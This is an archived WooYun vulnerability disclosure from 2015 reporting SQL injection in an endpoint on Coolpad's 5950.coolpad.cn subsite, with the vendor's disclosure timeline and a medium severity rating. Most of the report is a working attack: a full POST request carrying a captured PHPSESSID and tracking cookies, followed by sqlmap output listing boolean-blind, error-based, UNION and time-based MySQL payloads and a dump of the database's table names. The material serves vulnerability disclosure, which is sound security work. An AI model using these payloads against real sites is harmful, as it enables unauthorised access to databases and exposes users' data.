乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-25: 细节已通知厂商并且等待厂商处理中 2015-05-28: 厂商已经确认,细节仅向厂商公开 2015-06-07: 细节向核心白帽子及相关领域专家公开 2015-06-17: 细节向普通白帽子公开 2015-06-27: 细节向实习白帽子公开 2015-07-12: 细节向公众公开
12
http://5950.coolpad.cn/ 分站地址post数据:
POST /interface.php?c=users51&m=clickFiveAddOne HTTP/1.0Host: 5950.coolpad.cnProxy-Connection: keep-aliveContent-Length: 5Origin: http://5950.coolpad.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36content-type: application/x-www-form-urlencodedAccept: */*Referer: http://5950.coolpad.cn/swf2/coolpadindex.swfAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: __utmaxx233=238988767.846963834.1432533975.1432533975.1432533975.1; __utmcxx233=238988767; __utmz=238988767.1432533975.1.1.utmccn=(referral)|utmcsr=mcsdl.yulong.com|utmcct=/index/index.html|utmcmd=referral; __scnt=1; PHPSESSID=2ph1sbc53npacfss50s5ackli4; __utmbxx233=238988767; _jzqa=1.3850769915902337500.1432534282.1432534282.1432534282.1; _jzqc=1; _jzqx=1.1432534282.1432534282.1.jzqsr=5950%2Ecoolpad%2Ecn|jzqct=/swf2/coolpadindex%2Eswf.-; _jzqckmp=1; _jzqb=1.1.10.1432534282.0id=11注入参数:sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=11 AND 6429=6429 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=11 AND (SELECT 7365 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT (CASE WHEN (7365=7365) THEN 1 ELSE 0 END)),0x716a707a71,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: id=-6987 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706b6a71,0x6871696c4f68754a6644,0x716a707a71),NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=11 AND SLEEP(5)---[14:16:38] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.4.15back-end DBMS: MySQL 5.0[14:16:38] [INFO] testing if current user is DBA[14:16:38] [INFO] fetching current user
跑个表:
Database: 5950coolpad[13 tables]+----------------------+| add_click_good_count || add_user_count || click_find_king || click_five_add_one || click_good || click_good_one || find_king || five_add_one || five_add_one_code || game || game_result || login_log || sendinfo_log |+----------------------+
过滤
危害等级:中
漏洞Rank:8
确认时间:2015-05-28 10:15
暂无